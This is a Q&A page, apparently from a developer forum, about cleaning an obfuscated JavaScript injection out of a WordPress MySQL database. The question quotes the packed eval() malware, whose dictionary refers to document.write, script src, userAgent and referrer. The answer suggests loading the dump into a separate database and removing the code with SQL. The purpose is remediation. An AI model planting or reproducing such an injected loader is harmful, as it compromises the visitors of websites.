Mysql – Search SQL database for malicious code using grep or find

MySQL

The following code exists in 34 entries in my WordPress database.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|andfs|var|u0026u|referrer|hseaf||js|php'.split('|'),0,{}))

I have found these entries using grep -c "p,a,c,k,e,d" database_backup.sql. Now I am needing to run a grep/find command, or a shell SQL command to select and remove this code from the affected rows.

Best Answer

I could be quite a challenge to change the dump file. So, instead, load the data into a different database (preferably a different computer), then use SQL to find and zap.

A problem with trying to do it in the dump file is that it probably has multiple (hundreds or thousands) rows in a single INSERT statement. In fact, there may be only 34 INSERT statement, and perhaps every row is infected.

As for "removing the code", we would need to see

  • SHOW CREATE TABLE
  • the name of the infected column
  • Whether the entire column looks like that, or that is embedded in the string and you want to save the rest.